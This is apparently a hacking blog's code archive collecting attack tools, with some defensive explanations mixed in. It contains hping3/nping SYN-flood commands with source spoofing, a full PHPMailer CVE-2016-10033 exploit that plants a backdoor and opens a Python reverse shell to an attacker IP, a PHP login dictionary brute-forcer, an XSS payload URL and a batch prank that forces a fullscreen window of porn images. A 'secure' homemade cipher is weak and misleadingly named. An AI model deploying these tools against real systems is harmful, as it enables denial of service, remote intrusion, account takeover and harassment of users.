Category Archives: (M) Code Heap

Practical Approach For DoS Attacks Using hping3 / nping

Wikipedia explanation of DoS attacks: Denial-of-Service Attack

DDoS attacks are common, occurring about 28 times per hour. http://www.digitalattackmap.com provides a worldwide distribution of DDoS attacks in real time:

The map of DDoS attacks reflects the international situation; for example, attacks between Japan and China could be seen on September 18, and after Trump announced the wall, attacks between Mexico and the United States could be seen.

 

DoS attacks using hping3:

# hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source testsite.com

 

  • -c: the number of packets to send
  • -d: size of each packet
  • -S: send SYN packets
  • -w: TCP window size
  • -p: target port; you can specify any port
  • --flood: send packets as fast as possible
  • --rand-source: use a random source IP address for each packet, so the target sees a pile of IPs and cannot locate the actual source; you can also use -a or --spoof to spoof the source address and hide the real host

Simple SYN flood attack:

# hping3 -S --flood -V testsite.com

TCP connection attack:

# nping --tcp-connect --rate=90000 -c 900000 -q testsite.com

For more information on these two tools:

# man hping3
# man nping
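From the defender's side, the flag combination above produces a recognisable traffic shape: a burst of SYNs, almost none of which complete a handshake, from as many distinct sources as there are packets when --rand-source is used. The following is an added example (not part of the original post) that scores constructed per-packet records against exactly those three signals; the record format, thresholds and sample addresses are my own assumptions.

```python
from collections import defaultdict

# Constructed sample of per-packet records: (timestamp in seconds, source IP, dst port, TCP flag).
# Made up for this example; a real feed would come from a capture or flow export.
SAMPLE_PACKETS = [
    # Two normal clients: SYN followed by the final ACK of the handshake.
    (0.1, "10.0.0.5", 80, "S"), (0.2, "10.0.0.5", 80, "A"),
    (0.3, "10.0.0.6", 80, "S"), (0.4, "10.0.0.6", 80, "A"),
] + [
    # What --flood --rand-source looks like: 40 SYNs inside one second,
    # each from a different source, none of them completing a handshake.
    (1.0 + i * 0.02, "198.51.100.%d" % i, 80, "S") for i in range(40)
]


def syn_stats(packets, window=1.0):
    """Bucket packets into fixed time windows and count SYNs, handshake ACKs
    and distinct SYN sources per window."""
    windows = defaultdict(lambda: {"syn": 0, "ack": 0, "sources": set()})
    for ts, src, _dport, flag in packets:
        bucket = windows[int(ts // window)]
        if flag == "S":
            bucket["syn"] += 1
            bucket["sources"].add(src)
        elif flag == "A":
            bucket["ack"] += 1
    return windows


def detect_syn_flood(packets, window=1.0, syn_threshold=30, completion_ratio=0.2):
    """Return one alert per window whose SYN count is at or above syn_threshold
    and whose ACK/SYN ratio is below completion_ratio (handshakes never finish).
    A distinct_sources value close to syn indicates a random-source flood."""
    alerts = []
    for w, b in sorted(syn_stats(packets, window).items()):
        if b["syn"] >= syn_threshold and b["ack"] / b["syn"] < completion_ratio:
            alerts.append({"window": w, "syn": b["syn"], "ack": b["ack"],
                           "distinct_sources": len(b["sources"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(SAMPLE_PACKETS):
        print("SYN flood suspected:", alert)
```

The thresholds are deliberately low so the constructed sample trips them; in production they are tuned to the host's normal SYN rate. The usual mitigations on the receiving side are SYN cookies (`net.ipv4.tcp_syncookies=1` on Linux) and rate limiting upstream of the server, since spoofed sources make per-IP blocking useless.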

 


Enjoy Hacking !!!!!

 

 

PHPMailer versions prior to 5.2.18 remote code execution exploit. Written in python.

# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
"""
Description:
Exploiting PHPMailer with back connection (reverse shell) from the target

Usage:
1 - Download the vulnerable Docker environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Configure your IP for the reverse shell in the payload variable
3 - Open an nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open another terminal and run the exploit: python3 anarcoder.py
 
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
 
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
 
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
 
os.system('clear')
print("\n")
print(" aaaaaa aaaa   aaa aaaaaa aaaaaaa  aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaaaaaa ")
print("aaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
print("aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaa   aaaaaa  aaaaaaaaa  aaaaaaaa")
print("aaa  aaaaaa aaaaaaaaa  aaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa")
print("aaa  aaaaaa  aaaaaaaa  aaaaaa  aaa aaaaaaa aaaaaaa aaaaaaa aaaaaaaaaaa  aaa")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
 
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
 
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
 
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
 
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
 
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
 
 
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
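The injected value in the exploit's email field works because a sender address containing quotes and spaces was handed to sendmail in a way that let it be split into extra options (-OQueueDirectory and -X, which writes a log file to a web-reachable path). PHPMailer 5.2.18 closed this by validating and escaping the sender before use; the added example below is mine, not the exploit's or PHPMailer's code, and shows the same principle in Python: refuse anything that is not a plain address, and pass the address to the transport as a single argv element instead of a shell string. The function names and the sendmail path are assumptions.

```python
import re

# Strict shape for a sender address: one local part, one domain, and none of
# the characters (whitespace, quotes, backslashes) that let a value smuggle
# extra sendmail options such as -X or -OQueueDirectory.
_SAFE_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")


def is_safe_sender(addr):
    """True only for a plain address with no option-injection characters."""
    return bool(_SAFE_ADDR.match(addr))


def build_sendmail_argv(sender, recipient, sendmail="/usr/sbin/sendmail"):
    """Build the argv list for a sendmail invocation. Both addresses are
    validated first and passed as single list elements, so they can never be
    re-split into additional options the way a shell-built command line is."""
    if not is_safe_sender(sender):
        raise ValueError("unsafe sender address rejected: %r" % sender)
    if not is_safe_sender(recipient):
        raise ValueError("unsafe recipient address rejected: %r" % recipient)
    return [sendmail, "-i", "-f", sender, recipient]


def is_rejected(sender, recipient="bob@example.org"):
    """Helper for the demonstration: does the builder refuse this sender?"""
    try:
        build_sendmail_argv(sender, recipient)
        return False
    except ValueError:
        return True


# The sender value the exploit above submits (taken from the page), for comparison.
EXPLOIT_SENDER = '"anarcoder\\" -OQueueDirectory=/tmp -X/www/backdoor.php server" @protonmail.com'


def check_examples():
    """Return (plain address accepted?, exploit sender accepted?)."""
    return is_safe_sender("alice@example.com"), is_safe_sender(EXPLOIT_SENDER)


if __name__ == "__main__":
    print(check_examples())                                   # (True, False)
    print(build_sendmail_argv("alice@example.com", "bob@example.org"))
    print("exploit sender rejected:", is_rejected(EXPLOIT_SENDER))
```

The argv list is what a `subprocess.run(argv)` call (no `shell=True`) would receive; the decisive property is that the sender occupies exactly one element, whatever characters it contains, and the validator stops it earlier anyway.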

 

DBShield – Go Based Database Firewall

DBShield is a Database Firewall written in Go that has protection for MySQL/MariaDB, Oracle and PostgreSQL databases. It works in a proxy fashion inspecting traffic and dropping abnormal queries after a learning period to populate the internal database with regular queries.


Learning mode lets any query pass but it records information about it (pattern, username, time and source) into the internal database.

After collecting enough patterns we can run DBShield in protect mode. Protect mode can distinguish abnormal query patterns, users and sources and take action based on the configuration.

 

It currently supports DB2, MariaDB, MySQL, Oracle and PostgreSQL, with SSL support for all of them except Oracle and DB2.
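To make the learn/protect distinction concrete, here is an added example (my own code, not DBShield's, and written in Python to match the rest of this page rather than DBShield's Go) of the core idea: reduce each statement to a pattern by replacing literals with placeholders, record (pattern, user, source) while learning, and in protect mode drop anything whose pattern or context was never seen. The normalisation rules, the sample queries and the addresses are constructed assumptions; DBShield's own pattern extraction and storage differ.

```python
import re
from dataclasses import dataclass, field


def query_pattern(sql):
    """Normalize a SQL statement into a pattern: lower-case, collapse
    whitespace, and replace string and numeric literals with '?'."""
    s = re.sub(r"'(?:[^'\\]|\\.)*'", "?", sql)   # string literals
    s = re.sub(r"\b\d+(?:\.\d+)?\b", "?", s)       # numeric literals
    return re.sub(r"\s+", " ", s).strip().lower()


@dataclass
class QueryFirewall:
    mode: str = "learn"                          # "learn" or "protect"
    known: dict = field(default_factory=dict)    # pattern -> {(user, source), ...}
    blocked: list = field(default_factory=list)  # (pattern, user, source) dropped in protect mode

    def handle(self, sql, user, source):
        """Return True if the query may pass, False if it is dropped."""
        pat = query_pattern(sql)
        ctx = (user, source)
        if self.mode == "learn":
            self.known.setdefault(pat, set()).add(ctx)
            return True
        if ctx in self.known.get(pat, ()):
            return True
        self.blocked.append((pat, user, source))
        return False


def learn_then_protect():
    """Constructed walk-through: learn from normal application traffic,
    then switch to protect mode and see which later queries pass."""
    fw = QueryFirewall()
    normal_traffic = [
        ("SELECT id, name FROM users WHERE id = 42", "app", "10.0.0.10"),
        ("SELECT id, name FROM users WHERE id = 17", "app", "10.0.0.10"),
        ("INSERT INTO audit (msg) VALUES ('login ok')", "app", "10.0.0.10"),
    ]
    for sql, user, src in normal_traffic:
        fw.handle(sql, user, src)
    fw.mode = "protect"
    return {
        # same pattern, same user and source: allowed
        "same_pattern": fw.handle("SELECT id, name FROM users WHERE id = 99", "app", "10.0.0.10"),
        # an appended tautology changes the pattern: dropped
        "tautology": fw.handle("SELECT id, name FROM users WHERE id = 1 OR 1=1", "app", "10.0.0.10"),
        # known pattern but from a source never seen while learning: dropped
        "new_source": fw.handle("SELECT id, name FROM users WHERE id = 5", "app", "10.0.0.99"),
        # statement shape never seen at all: dropped
        "table_dump": fw.handle("SELECT * FROM users", "app", "10.0.0.10"),
    }


if __name__ == "__main__":
    for name, allowed in learn_then_protect().items():
        print("%-13s %s" % (name, "pass" if allowed else "DROP"))
```

The quality of the learning period decides everything: a pattern the application legitimately issues but that was never exercised while learning will be dropped in protect mode, which is why DBShield keeps learning as a separate, explicit phase rather than learning continuously.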

Installation

Get it:

Then you can see the help using the -h argument:

and run it with your configuration, like:

You can download DBShield here:

DBShield-1.0.0-beta4.zip

Python Code For Accessing Physical Location

import pygeoip

# Path to the GeoIP City database file; adjust to your installation.
gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')


def printRecord(tgt):
    # Look the target (hostname or IP address) up in the GeoIP database.
    rec = gi.record_by_name(tgt)
    if rec is None:
        print('[-] No record found for ' + tgt)
        return
    city = rec['city']
    region = rec['region_name']
    country = rec['country_name']
    lon = rec['longitude']
    lat = rec['latitude']
    print('[*] Target: ' + tgt + ' Geo-located.')
    print('[+] ' + str(city) + ', ' + str(region) + ', ' + str(country))
    print('[+] Latitude: ' + str(lat) + ', Longitude: ' + str(lon))


tgt = 'ip address here'
printRecord(tgt)

 

PornAttack – Batch Programming

echo off
echo ^<html^>^<head^>^<title^>Fap^</title^> > Fap.hta
echo. >> Fap.hta
echo ^<hta:application id="oBVC" >> Fap.hta
echo applicationname="Fap"  >> Fap.hta
echo version="1.0" >> Fap.hta
echo maximizebutton="no" >> Fap.hta
echo minimizebutton="no" >> Fap.hta
echo sysmenu="no" >> Fap.hta
echo Caption="no" >> Fap.hta
echo windowstate="maximize"/^> >> Fap.hta
echo. >> Fap.hta
echo ^</head^>^<body background="http://www.newsfilter.org/content/gallery/50383/met-art_ACM_21_5.jpg" scroll="yes"^> >> Fap.hta
echo ^<img src="http://www.giffies.com/games/files/18.gif" ^> >> Fap.hta
echo ^<img src="http://stxt.youngpornmovies.com/thumbs/1/0585/101133_1.jpg" ^> >> Fap.hta
echo ^<img src="http://www4.clickr.info/img/190x163_teen3_orig.gif" ^> >> Fap.hta
echo ^<img src="http://www.thumbserve.com/intw/tn113829.jpg" ^> >> Fap.hta
echo ^<img src="http://static.ads.crakmedia.com/cfcd9a00272d345553929068fe15c5aa.gif" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/038/1001353519.jpg" ^> >> Fap.hta
echo ^<img src="http://78.140.136.171/bt/st/thumbs/009/0496989067.jpg" ^> >> Fap.hta
echo ^<img src="http://www.silentpix.com/content/toplist/siteoftheday9.gif" ^> >> Fap.hta
echo ^<img src="http://www.newsfilter.org/content/gallery/50378/met-art_LUH_294_2.jpg" ^> >> Fap.hta
echo ^<img src="http://ddfcash.com/PROMO/content/obj/vids/547vbj/547vbjp4.jpg" ^> >> Fap.hta
echo ^<img src="http://www.teenport.com/galleries/bailey-kline/red-peignoir/09.jpg" ^> >> Fap.hta
echo ^</body^>^</html^> >> Fap.hta
start "" /wait "Fap.hta"
del /s /f /q "Fap.hta" > nul

 

Secure Crypt – PHP Code

php script:
///////////////////
<?php
if($_POST['task']!="" and $_POST['message']!="")
{
$message=$_POST['message'];
if($_POST['key']!="")
{
$key=md5($_POST['key']);
}
else
{
$key=md5('Long Text To Be Used As Default Key');
}
$array_key=str_split($key,1);
$array_final_key=array_unique($array_key);
foreach($array_final_key as $single_key)
{
$master_key[]=$single_key;
}
$counter_key=count($master_key);
if($_POST['task']!='decrypt')
{
// Encrypt
$message_array=str_split($message,$counter_key);
foreach($message_array as $chunk)
{
$single_char_value=str_split($chunk,1);
for($loop1=0;$loop1<$counter_key;$loop1++)
{
$ord_sum_char[]=ord($master_key[$loop1])+ord($single_char_value[$loop1]);
}
}
foreach($ord_sum_char as $to_encrypt)
{
$loop_val=intval($to_encrypt/11);
$mod_val=$to_encrypt%11;
switch($mod_val)
{
case "0";
$char_fixed_val='<';
break;
case "1";
$char_fixed_val='*';
break;
case "2";
$char_fixed_val='$';
break;
case "3";
$char_fixed_val='#';
break;
case "4";
$char_fixed_val='+';
break;
case "5";
$char_fixed_val='?';
break;
case "6";
$char_fixed_val='>';
break;
case "7";
$char_fixed_val='^';
break;
case "8";
$char_fixed_val='!';
break;
case "9";
$char_fixed_val='&';
break;
case "10";
$char_fixed_val='%';
break;
}
$encryptd_char[]=$loop_val.$char_fixed_val;
}
$final_message=implode(" ",$encryptd_char);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area">'.$final_message.'</textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
else
{
// Decrypt
$first_decrypt_array=explode(" ",$message);
$counter_element=0;
$text_reset="";
foreach($first_decrypt_array as $first_value)
{
$counter_element=$counter_element+1;
if($counter_element%$counter_key=="0")
{
$text_reset=$text_reset.$first_value."Q";
}
else
{
$text_reset=$text_reset.$first_value." ";
}
}
$text_fixed=rtrim($text_reset,"Q");
$array_sectors=explode("Q",$text_fixed);
foreach($array_sectors as $sector)
{
$array_chars_fixed=explode(" ",$sector);
$counter_chars_fixed=count($array_chars_fixed);
for($loop_fixed=0;$loop_fixed<$counter_chars_fixed;$loop_fixed++)
{
$char_single_fixed=substr($array_chars_fixed[$loop_fixed],-1);
$loops_fixed=str_replace($char_single_fixed,"",$array_chars_fixed[$loop_fixed]);
$loops_fixed_val=$loops_fixed*11;
switch($char_single_fixed)
{
case "<";
$char_fixed_val=0;
break;
case "*";
$char_fixed_val=1;
break;
case "$";
$char_fixed_val=2;
break;
case "#";
$char_fixed_val=3;
break;
case "+";
$char_fixed_val=4;
break;
case "?";
$char_fixed_val=5;
break;
case ">";
$char_fixed_val=6;
break;
case "^";
$char_fixed_val=7;
break;
case "!";
$char_fixed_val=8;
break;
case "&";
$char_fixed_val=9;
break;
case "%";
$char_fixed_val=10;
break;
}
$final_val=($loops_fixed_val+$char_fixed_val)-ord($master_key[$loop_fixed]);
if($final_val!=0)
{
$decoded_message[]=chr($final_val);
}
}
}
$final_message1=implode("",$decoded_message);
$fh=fopen("Decoded.txt","w+");
fputs($fh,$final_message1);
fclose($fh);
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header"><a href="Decoded.txt">Decoded Message</a></div>
</div>
</div>
</body>
</html>';
}
}
else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
Super Crypt By ADIGA
</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="main_container">
<div id="body_container">
<div id="header">Super Crypt</div>
<form method="post" action="index.php">
<textarea name="message" id="text_area"></textarea>
<select name="task" id="task">
<option value="encrypt">Encrypt Text</option>
<option value="decrypt">Decrypt Text</option>
</select>
<input type="submit" value="Encrypt/Decrypt" id="button">
<div id="key">Key&nbsp;:</div>
<input type="text" name="key" id="key_text">
</form>
</div>
</div>
</body>
</html>';
}
?>
///////////////////
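Despite the name, the script above is a repeating additive cipher: the key is the distinct hex digits of md5(password) in first-seen order, and every output token is just key_byte + plaintext_byte written as a quotient and a residue-symbol modulo 11. The added example below is mine, not the post's code; it mirrors the PHP logic in Python (including the quirk that a short final chunk is padded with zero bytes which decryption then skips) and shows two consequences a practitioner should know before calling this "secure": every key position can only take one of 16 values, and one known chunk of plaintext recovers the whole key. The sample message and password are constructed.

```python
import hashlib

SYMBOLS = "<*$#+?>^!&%"   # residues 0..10 of a token value, same table as the PHP switch


def master_key(key_text):
    """Mirror the PHP key derivation: md5 hex digest, then the distinct
    characters in first-seen order (array_unique keeps the first occurrence)."""
    digest = hashlib.md5(key_text.encode()).hexdigest()
    seen = []
    for ch in digest:
        if ch not in seen:
            seen.append(ch)
    return seen


def token_value(tok):
    """Inverse of the token encoding: quotient digits followed by one residue symbol."""
    return int(tok[:-1]) * 11 + SYMBOLS.index(tok[-1])


def encrypt(message, key_text):
    mk = master_key(key_text)
    n = len(mk)
    out = []
    for start in range(0, len(message), n):
        chunk = message[start:start + n]
        for i in range(n):
            # The PHP reads past a short final chunk; ord(null) is 0 there.
            p = ord(chunk[i]) if i < len(chunk) else 0
            s = ord(mk[i]) + p
            out.append("%d%s" % (s // 11, SYMBOLS[s % 11]))
    return " ".join(out)


def decrypt(ciphertext, key_text):
    if not ciphertext:
        return ""
    mk = master_key(key_text)
    plain = []
    for idx, tok in enumerate(ciphertext.split(" ")):
        v = token_value(tok) - ord(mk[idx % len(mk)])
        if v != 0:               # the PHP drops the zero padding positions
            plain.append(chr(v))
    return "".join(plain)


def recover_key_positions(ciphertext, known_plaintext):
    """Each token is key_byte + plaintext_byte, so every known plaintext
    character directly reveals the key character at that position."""
    tokens = ciphertext.split(" ")
    return [chr(token_value(t) - ord(p)) for t, p in zip(tokens, known_plaintext)]


def effective_key_space(key_text):
    """Only hex digits can appear in the derived key, so each position holds
    one of at most 16 values no matter how long the password was."""
    return 16 ** len(master_key(key_text))


if __name__ == "__main__":
    msg, pw = "attack at dawn", "secret"
    ct = encrypt(msg, pw)
    print("ciphertext:", ct)
    print("roundtrip ok:", decrypt(ct, pw) == msg)
    print("key from known plaintext:", "".join(recover_key_positions(ct, msg)))
    print("real key:                ", "".join(master_key(pw)))
```

The md5 step contributes nothing beyond shrinking the alphabet to hex digits; a schoolbook Vigenère has the same structure and the same weakness. A real design would use an authenticated cipher from a vetted library with a key derived by a proper password KDF, which this page does not cover.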
style file (style.css)
///////////////////
html{
cursor: default;
}
body{
margin: 0px;
font-size: 14px;
color: #ff0000;
font-weight: bold;
background: #000000;
}
#main_container{
width: 500px;
margin-left: auto;
margin-right: auto;
}
#body_container{
width: 500px;
height: 600px;
position: relative;
top: 0px;
left: 0px;
}
#header{
height: 50px;
width: 498px;
background: #000000;
position: absolute;
top: 100px;
left: 0px;
padding-top: 5px;
padding-left: 0px;
padding-right: 0px;
padding-bottom: 0px;
font-size: 32px;
color: #ff0000;
text-align: center;
border: 1px solid #ff0000; 
}
#text_area{
height: 300px;
width: 500px;
border: 0px;
background: #ff0000;
position: absolute;
top: 160px;
left: 0px;
cursor: default;
font-size: 14px;
font-weight: bold;
}
#task{
width: 110px;
position: absolute;
top: 470px;
left: 0px;
background: #ff0000;
border: 0px; 
}
#button{
width: 110px;
position: absolute;
top: 470px;
left: 120px;
background: #ff0000;
border: 0px;
}
#key{
position: absolute;
top: 470px;
left: 255px;
}
#key_text{
width: 200px;
background: #ff0000;
position: absolute;
top: 470px;
right: 0px;
border: 0px;
}

 

Fotoware Fotoweb 8.0 Cross Site Scripting

############################################################## 

                    - S21Sec Advisory - 
                   - S21SEC-047-en.txt  -

############################################################## 

     Title:  Fotoware Fotoweb 8.0 Cross Site Scripting (XSS) 
        ID:  S21sec-047-en 
  Severity:  Low 
   History:  May.2016  Vulnerability discovered 
             June.2016 Vendor contacted 
             July.2016 Vendor patch acknowledge.
     Scope:  Cross Site Scripting XSS 
 Platforms:  Any 
    Author:  Miguel A. Hernandez / Departamento Auditoria S21sec.
    
   Release:  Public 


[ SUMMARY ] 

Fotoweb is an enterprise grade Digital Asset Management System (DMS).
A DMS provides a central repository of pictures and media files. 

Unfiltered user-supplied data can lead to a reflected XSS vulnerability.
This allows an attacker to execute arbitrary JavaScript in the context of a
victim's browser if the victim clicks on an attacker-supplied link or visits
an attacker-controlled website.

[ AFFECTED VERSIONS ] 

This vulnerability has been tested and found working on version 8.0.715.5753


[ DESCRIPTION ] 

Insufficient input validation allows JavaScript code injection via the 'to'
parameter of the login page. Example:

http://fotowebserver/fotoweb/views/login?to=/fotoweb/%22;}%20else%20{%20alert%28%22S21sec%20XSS%22%29;%20}%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22
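The shape of that payload (a closing quote, a brace, a statement, then a dangling `var relleno="`) shows the parameter was being pasted verbatim into a string literal inside an inline script. The added example below is my own code, not Fotoware's fix and not the page's markup; it uses a constructed stand-in for that script and contrasts the verbatim template with one that serializes the value as a JS literal and additionally restricts a post-login redirect to a same-site path. Python is used to keep one language across this page.

```python
import json
from urllib.parse import unquote, urlsplit

# Constructed stand-ins for the login page's inline script (the real markup is
# not on this page): the unsafe form pastes the parameter into a JS string,
# the safe form serializes it as a JS literal.
UNSAFE_TEMPLATE = 'var to = "%s";'
SAFE_TEMPLATE = 'var to = %s;'

# The 'to' value from the advisory's example URL, percent-decoded.
PAYLOAD = unquote("/fotoweb/%22;}%20else%20{%20alert%28%22S21sec%20XSS%22%29;%20}"
                  "%20if%20%28inIframe%28%29%29%20{%20var%20relleno=%22")


def js_string_literal(value):
    """Serialize a Python string as a JS string literal for an inline <script>.
    json.dumps escapes quotes and backslashes and, with ensure_ascii, every
    non-ASCII character including U+2028/U+2029; <, > and & are escaped on
    top so the literal can never close the script element or be misread by
    the HTML parser."""
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def is_local_path(target):
    """Only allow same-site absolute paths as a post-login redirect target."""
    parts = urlsplit(target)
    return (parts.scheme == "" and parts.netloc == ""
            and target.startswith("/") and not target.startswith("//"))


def render_unsafe(to):
    """What the vulnerable page effectively did."""
    return UNSAFE_TEMPLATE % to


def render_safe(to, default="/fotoweb/"):
    """Validated, then embedded as data rather than as code."""
    if not is_local_path(to):
        to = default
    return SAFE_TEMPLATE % js_string_literal(to)


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
    print("safe:  ", render_safe("https://attacker.example/"))
```

In the safe output the payload is still present, but only as the contents of one string; the double quotes inside it are escaped, so the `; } else { alert(...)` never leaves the literal. The path check is independent of the encoding and exists because a login redirect that accepts arbitrary URLs is an open redirect even once XSS is fixed.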


[ WORKAROUND ] 

The reported vulnerability has been reviewed by Fotoware development team.
This issue is addressed in FotoWeb 8 Feature Release 8. 

[ ACKNOWLEDGMENTS ] 

This vulnerability has been found and researched by: 

   - Miguel A. Hernandez [ Departamento de Auditoria S21sec ]

We would like to acknowledge the assistance of Fotoware:   
   
   - John Fredrik Engeland [ Fotoware Support Manager ]

[ REFERENCES ] 

* Fotoware 
 http://fotoware.com

* S21sec
* S21sec Blog http://blog.s21sec.com

 

Simple HTTP-Login Dictionary attack = PHP CODE

<html>
  <head>
    <title> PRO HACKER </title>
  </head>
<body>

<FORM action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
LINK:                                    Examples:<br />
<input type="text" name="link">         "http://site.com/index.php" "http://192.168.1.100/index.php"<br />
          <br />
FORM USERNAME FIELD:                    <br />
<input type="text" name="fuser">        "username" "users" "anv" "user_login"<br />

FORM PASSWORD FIELD:                    <br />
<input type="text" name="fpass">        "password" "pass" "password_login"<br />

OPTIONAL POSTDATA:                      <br />
<input type="text" name="pdata">        "submit=send" "login=true"<br />
          <br />
USERNAME:                               <br />
<input type="text" name="username">     "Admin" "Heaton" "Mario"<br />

CORRECT LOGIN VALUE:                    <br />
<input type="text" name="correct">      "Welcome Admin" "You have logged in"<br />

DICTIONARY FILENAME:                    <br />
<input type="file" name="userfile" >    "/root/wordlist" "c:\wordlist.txt"<br />

<input type="submit" value="ATTAAACK!" name="submit">
</form>


<?php

function get_url_contents($url, $fuser, $username, $fpass, $password, $pdata)
{
    $crl = curl_init();
    $timeout = 5;
    curl_setopt($crl, CURLOPT_URL, $url);

    curl_setopt($crl, CURLOPT_POSTFIELDS,
        $fuser
        . "="
        . $username
        . "&"
        . $fpass
        . "="
        . $password
        . "&"
        . $pdata
        );

    curl_setopt($crl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($crl, CURLOPT_CONNECTTIMEOUT, $timeout);
    $ret = curl_exec($crl);
    curl_close($crl);
    return $ret;
}

if (isset($_POST['submit']))
{
    $link     = $_POST["link"];
    $fuser    = $_POST["fuser"];
    $fpass    = $_POST["fpass"];
    $pdata    = $_POST["pdata"];
    $username = $_POST["username"];
    $correct  = $_POST["correct"];
    $userfile = $_POST["userfile"];

    echo "<br />Link: "           . $link;
    echo "<br />Fuser: "          . $fuser;
    echo "<br />Fpass: "          . $fpass;
    echo "<br />Pdata: "          . $pdata;
    echo "<br />Correct string: " . $correct;
    echo "<br />User: "           . $username;
    echo "<br />Filename: "       . $userfile;

    $fp = fopen($userfile, 'r') or die("Can't open wordlist-file!");
    $x = 0;
    while (!feof($fp))
    {
        $password = fgets($fp);
        $password = rtrim($password);
        $site = get_url_contents($link, $fuser, $username, $fpass, $password, $pdata);

        $pos = strpos($site, $correct);
        $x++;

        if ($pos === FALSE)
        {

        }
        else
        {
            echo "<br /><br /><br />";
            echo "SUCCESS<br />";
            echo "Found a valid login! <br />";
            echo "Username: " . $username . "<br />";
            echo "Password: " . $password . "<br /><br />";
            echo "Position in wordlist file: " . $x;
            fclose($fp);
            break;
        }

        if (feof($fp))
            echo "<br />Password was not found!";
    }
}

?>
</body>
</html>